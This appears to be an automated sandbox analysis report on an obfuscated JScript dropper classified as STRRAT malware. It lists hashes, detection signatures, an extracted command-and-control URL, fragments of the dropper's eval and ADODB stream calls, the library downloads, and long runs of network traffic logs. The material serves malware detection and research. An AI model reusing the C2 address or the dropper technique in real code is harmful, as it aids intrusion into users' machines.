Windows Analysis Report
8NR95Z54o9.js

Overview

General Information

Sample name: 8NR95Z54o9.js
renamed because original name is a hash value
Original sample name: dbab3d6f8c0c56ea0f463696b651aa3e93f5b19f.rl.js
Analysis ID: 1538416
MD5: 0bbebce60f58abbcc864f8baf65849ba
SHA1: dbab3d6f8c0c56ea0f463696b651aa3e93f5b19f
SHA256: f252f6e0d8f9f687751843dbc0be03d4f2ceb468e8453a4940d203f78cc5f04d
Tags: CVE-2014-3931CVE-2021-44228jslog4jlog4shellReversingLabsstrratuser-NDA0E
Infos:

Detection

STRRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains call to eval containing suspicious API calls
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential malicious VBS/JS script found (suspicious encoded strings)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 8NR95Z54o9.js Avira: detected
Found malware configuration
Source: javaw.exe.7560.1.memstrmin Malware Configuration Extractor: STRRAT {"C2 list": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5"}
Multi AV Scanner detection for submitted file
Source: 8NR95Z54o9.js ReversingLabs: Detection: 42%
Source: 8NR95Z54o9.js Virustotal: Detection: 53% Perma Link
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50090 version: TLS 1.2

Software Vulnerabilities
barindex
JavaScript source code contains call to eval containing suspicious API calls
Source: 8NR95Z54o9.js Argument value: ['"var tWtYcm = WSH.CreateObject("adodb.stream");"'] Go to definition
Source: 8NR95Z54o9.js Argument value: ['"var tWtYcm = WSH.CreateObject("adodb.stream");"', '"var ele = WSH.CreateObject("microsoft.xmldom").createElement("bsc");Array.prototype.nXt555h = eval"'] Go to definition
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: 8NR95Z54o9.js Return value : ['"var tWtYcm = WSH.CreateObject("adodb.stream");"'] Go to definition
Source: 8NR95Z54o9.js Return value : ['"var tWtYcm = WSH.CreateObject("adodb.stream");"'] Go to definition
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 1_2_021ECC98
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.232.192.209 199.232.192.209
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic DNS traffic detected: DNS query: github.com
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009804000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009804000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.000000000980B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
Source: javaw.exe, 00000001.00000003.1834325039.0000000014CED000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2843934028.0000000014CCC000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1834372032.0000000014D01000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2844738512.0000000014D23000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2971320672.0000000014D2A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000001.00000002.2964017700.0000000009B9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000001.00000002.2960804744.000000000455C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004356000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004294000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000001.00000002.2960804744.0000000004409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000001.00000002.2960804744.0000000004210000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004200000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.000000000446F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004449000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.000000000459A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.000000000438E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004504000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.00000000042D6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004326000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000001.00000002.2960804744.00000000042D6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2972366837.0000000015318000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2972089591.0000000015168000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
